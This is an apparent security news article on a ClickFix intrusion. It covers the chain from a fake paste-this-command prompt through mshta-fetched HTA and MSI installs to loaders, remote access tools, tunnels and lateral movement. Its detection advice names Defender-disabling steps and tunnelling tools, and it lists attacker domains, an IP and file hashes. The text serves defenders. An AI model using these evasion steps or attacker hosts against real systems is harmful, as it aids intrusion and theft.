Hackers Use ClickFix Prompt to Install MSI Package and Launch Hands-On-Keyboard Attack

A ClickFix attack observed by Huntress in May 2026 shows how one copied command can turn into a full network intrusion involving custom malware, remote access tools, lateral movement, and Defender evasion.

According to Huntress, the incident started when a user visited a compromised website and followed a fake troubleshooting prompt. The prompt told the user to press Win+R, paste a command into the Windows Run dialog, and run it.

The first infected system had no endpoint monitoring agent installed. That gave the attacker time to install an MSI package, deploy the Potemkin loader, load RMMProject in memory, add EtherRAT, create tunnels, and move laterally before defenders gained visibility.

ClickFix Turns the User Into the Delivery Mechanism

ClickFix is a social engineering technique that tricks users into running malicious commands themselves. Instead of relying on a malicious attachment, attackers show a fake error, verification step, browser fix, or support message that tells the victim exactly what to paste into Windows.

In this case, the command abused pcalua.exe, a legitimate Windows Program Compatibility Assistant component, to launch mshta.exe. The mshta.exe utility then retrieved a malicious HTA file from attacker-controlled infrastructure.

Red Canary describes mshta.exe as a Windows-native binary used to execute Microsoft HTML Application code. Attackers often abuse it because it can run script code through a trusted Windows utility.

Attack stage	What happened
Initial lure	User followed a fake ClickFix instruction on a compromised website
Command execution	The pasted command used pcalua.exe to proxy mshta.exe
Payload retrieval	mshta.exe fetched a malicious HTA file from attacker infrastructure
MSI install	The HTA downloaded and executed inst24.msi in the background
Loader deployment	The MSI installed the Potemkin loader and created persistence

Potemkin Loader Delivered RMMProject in Memory

The MSI package installed a custom x64 loader that Huntress calls Potemkin. It was dropped in the user profile and persisted through a Run registry key named RunSearch.

Potemkin uses a deterministic domain generation algorithm. Huntress said the loader can generate 10,000 candidate domains from a built-in word list and probe them until it finds an active command-and-control server.

After Potemkin connects to its server, its main job is to fetch and reflectively load RMMProject. The Hacker News also reported that this ClickFix chain installs an MSI package that drops Potemkin and leads to RMMProject and EtherRAT activity.

• Potemkin was delivered through an MSI installer named inst24.msi.
• The loader persisted through HKCU Run key activity.
• It used a DGA to find a live command-and-control domain.
• It reflectively loaded follow-on modules in memory.
• Its main payload was RMMProject, a Lua-scriptable remote access tool.

RMMProject Added Browser Theft and Remote Control

RMMProject is a larger malware framework delivered by Potemkin. Huntress said it includes 15 task types, including browser credential theft, cookie stealing, process injection, remote desktop control, and runtime module loading.

The malware also included tooling to target Chromium App-Bound Encryption protections. That matters because App-Bound Encryption was designed to make browser cookie theft harder by binding secrets more tightly to the application and system context.

The broader ClickFix trend is expanding. The Hacker News report noted that recent ClickFix campaigns have also delivered other loaders, including BabaDeda and Lorem Ipsum, alongside Potemkin.

Malware	Role in the intrusion
Potemkin	Custom loader that finds C2 infrastructure and loads modules in memory
RMMProject	Remote access framework with browser theft, remote desktop, and injection features
EtherRAT	Node.js backdoor that retrieves its C2 from Ethereum blockchain data
Chisel	Tunneling tool used for SOCKS proxy access during the intrusion
cloudflared	Renamed tunnel client used to maintain remote access into the environment

EtherRAT Added Blockchain-Based Resilience

Five hours after the first infection, the attacker deployed EtherRAT, a Node.js backdoor. EtherRAT resolves its command-and-control server through data stored on the Ethereum blockchain, which makes traditional domain takedowns less effective.

Sysdig previously documented EtherRAT as a persistent access implant that differs from simpler payloads because it uses blockchain-based infrastructure to retrieve control information.

In the Huntress case, EtherRAT was delivered through a separate MSI package named cons_1.0.1.msi and persisted through a Run key named EdgeUpdate. The name helped it masquerade as a browser update component.

The Intrusion Became Hands-On-Keyboard Activity

After the initial foothold, a human operator began working through the victim network manually. Huntress observed lateral movement across 11 hosts, with the attacker using tools and behaviors consistent with WMIExec and SMBExec activity.

The operator used compromised Administrator credentials, ran reconnaissance, moved to the domain controller, and pushed malware across the environment. This shows why a ClickFix prompt should not be treated as a low-level user mistake. It can become the start of a larger intrusion.

The attacker also fought Microsoft Defender throughout the session. Microsoft’s Add-MpPreference documentation says the cmdlet can add exclusions for file paths, extensions, and processes, which explains why bulk exclusion changes can become a major detection signal when they appear unexpectedly.

1. The attacker gained initial execution through the ClickFix command.
2. The HTA downloaded and ran an MSI package.
3. Potemkin established loader persistence.
4. RMMProject provided remote access and browser theft capabilities.
5. EtherRAT created a second persistent access path.
6. The attacker used compromised admin credentials for lateral movement.
7. Defender controls were weakened through exclusions, registry changes, and service tampering.

Cloudflare Tunnel and Chisel Helped Maintain Access

The attacker also set up a Cloudflare tunnel using a renamed copy of cloudflared. Cloudflare says Cloudflare Tunnel can connect applications and networks to Cloudflare through outbound-only connections, which makes it useful for legitimate remote access but attractive to attackers after compromise.

Chisel was also used to create SOCKS proxy access. Together, these tunnels gave the operator more than one way to reach into the environment and continue post-exploitation activity.

A renamed tunnel binary on an ordinary workstation should trigger immediate review. Cloudflare Tunnel has legitimate uses, but unexpected cloudflared activity on endpoints can indicate covert access.

Defender Evasion Was a Major Part of the Attack

The attacker repeatedly tried to weaken Windows Defender. Huntress observed AMSI patches, registry policy changes, reflective loading, Defender exclusion abuse, and attempts to stop the Defender service.

Security teams should treat mass Defender exclusion changes as suspicious, especially when paired with new Run keys, renamed tunneling tools, PowerShell scripts under ProgramData, or new MSI installs launched from temporary folders.

Microsoft’s Defender PowerShell documentation shows that exclusions can disable scanning for selected paths or processes. That legitimate administrative feature becomes dangerous when an attacker uses it to hide malware staging directories.

• Alert on pcalua.exe launching mshta.exe, PowerShell, cmd.exe, or scripts.
• Monitor mshta.exe fetching remote HTA files.
• Investigate MSI installs launched soon after browser activity.
• Alert on Run keys named RunSearch or EdgeUpdate when they point to unusual binaries.
• Review unexpected cloudflared, Chisel, or SOCKS proxy activity on endpoints.
• Treat Stop-Service WinDefend and bulk Defender exclusions as high-risk events.
• Ensure every endpoint has active monitoring before attackers get an unobserved foothold.

Indicators Linked to the ClickFix Intrusion

The indicators below are drawn from the Huntress case and should be combined with behavior-based detection. Attackers can rotate domains and filenames quickly, but the broader pattern remains clear: ClickFix prompt, pcalua.exe, mshta.exe, MSI installation, loader persistence, remote access tooling, and Defender tampering.

Type	Indicator	Description
SHA256	2abe5dd3a057fdef935722e50e9251c272d29fd26113187b853a1f9a9cb89d9b	Potemkin loader, RunSearch.exe
SHA256	3b7ae925e2d64522b4f69b56285b05aeca8c5aab5ab46a9c02c4fafb69d881ce	RMMProject RAT, avast_update.bin
SHA256	79f7b67ce8b39070f3e1c2b90fce0ce84134782a7dedcccc1edac197ee9e089b	inst24.msi, MSI installer that drops Potemkin
SHA256	2ada24dd6e517f37942b749c2bd57ddd97445e9853002cee70a0bc30d0b0ce3a	cons_1.0.1.msi, MSI that delivers EtherRAT
Domain	cl.distritovagas[.]com	ClickFix HTA delivery domain
Domain	sonra.eutialyson[.]com	MSI download domain
Domain	anus-staylard[.]xyz	Potemkin and RMMProject C2 domain
Domain	resumeacceptable[.]com	EtherRAT C2 resolved from Ethereum blockchain data
IP address	77.110.122[.]58	Primary C2 and staging server
Registry key	HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RunSearch	Potemkin persistence key
Registry key	HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EdgeUpdate	EtherRAT persistence key

How Organizations Can Reduce ClickFix Risk

The biggest lesson from this case is endpoint coverage. The attacker gained time because the first machine had no monitoring agent. Once visibility came online, the security team could identify and contain activity, but the initial gap shaped the damage window.

Organizations should also train users to reject browser prompts that ask them to paste commands into Run, PowerShell, Terminal, or Command Prompt. A real website should not ask a user to run a command to view a page, fix a CAPTCHA, install a browser update, or complete verification.

Huntress’ ClickFix guidance explains that the technique works because it looks like a normal online instruction. The latest Huntress intrusion report shows what can happen when that instruction runs on an unmonitored system.

Mshta monitoring should also be part of endpoint detection, especially when mshta.exe starts from pcalua.exe or reaches out to remote content. The EtherRAT research shows why blockchain-based C2 can complicate takedown efforts once a backdoor reaches the network.

FAQ